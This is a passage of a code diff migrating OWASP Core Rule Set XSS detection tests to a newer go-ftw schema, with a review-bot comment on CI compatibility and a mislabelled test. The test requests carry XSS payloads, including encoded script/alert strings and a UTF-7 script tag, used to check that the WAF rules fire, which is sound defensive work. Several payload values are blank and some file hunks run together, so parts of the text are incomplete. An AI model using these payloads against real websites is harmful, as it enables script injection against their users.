[941180] + - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/javascript-manual/document.cookie" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941180" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/javascript-manual/document.cookie" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] 
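Review bot: The test files in this series move to the newer go-ftw schema (`rule_id` under `meta`, `test_id` per test, `log.expect_ids` / `log.no_expect_ids` under `output`), which, as far as I know, older go-ftw releases do not accept; unless the test runner pinned in this repository's CI was bumped alongside this change, the migrated `tests/` tree would likely stop loading rather than fail on a specific case, so that bump is worth confirming in the same PR. The same applies to every other test-file hunk in this chunk (941181, 941190, 941230 through 941310). Separately, test 3's `desc: Node-validator deny list keywords, ARGS_NAMES` does not describe its stage, which carries the keyword as a `Cookie` header name; the sibling file 941190 labels the equivalent case `COOKIES_NAMES`, so `desc: Node-validator deny list keywords, COOKIES_NAMES` would read correctly here and at 941181 test 4.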
diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml
index a6f3217..ff74716 100644
--- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml
+++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml
@@ -1,75 +1,73 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "941181.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941181 tests: - - test_title: 941181-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=-->' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=--%3E' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '-->=941181-3' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '-->=941181-4' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941181" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 6b0f1e2..d41e2d4 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml 
@@ -1,92 +1,90 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "941190.yaml" - description: "Tests to trigger, or not trigger 941190" +rule_id: 941190 tests: - - test_title: 941190-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "941190-1=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "941190-1=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "x=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "x=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '' - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - test_title: 941230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] 
diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index b77c0de..6bd84e2 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,39 +1,37 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941240.yaml +rule_id: 941240 tests: - - test_title: 941240-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" - - test_title: 941240-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941240] + - test_id: 2 desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941250] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index d7e14f5..1cc0cb1 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml 
@@ -1,41 +1,39 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941260.yaml +rule_id: 941260 tests: - - test_title: 941260-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - test_title: 941260-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 26a2d79..dec0415 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml 
+++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941270.yaml +rule_id: 941270 tests: - - test_title: 941270-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - test_title: 941270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log: + expect_ids: [941270] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: 'payload=' + output: + log: + expect_ids: [941270] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index e34641c..8d2fa94 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml 
+++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml 
@@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941280.yaml +rule_id: 941280 tests: - - test_title: 941280-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - test_title: 941280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941280] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - test_title: 941290-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 
"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 43909b1..14f42f2 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml 
@@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941300.yaml +rule_id: 941300 tests: - - test_title: 941300-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - test_title: 941300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [941300] + - test_id: 2 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log: + expect_ids: [941300] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 453fac1..14f8c89 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml 
@@ -2,226 +2,225 @@ meta: author: "Christian S.J. Peron, Federico G. Schwindt, azurit" description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml +rule_id: 941310 tests: - - test_title: 941310-1 + - test_id: 1 desc: Positive test using single byte stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 2 desc: Positive test using utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 3 desc: Positive test using alternate utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" - data: 
var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" - data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 6 desc: Negative test for opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbc\xbc - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbc\xbc + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 7 desc: Negative test for closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbe\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test 
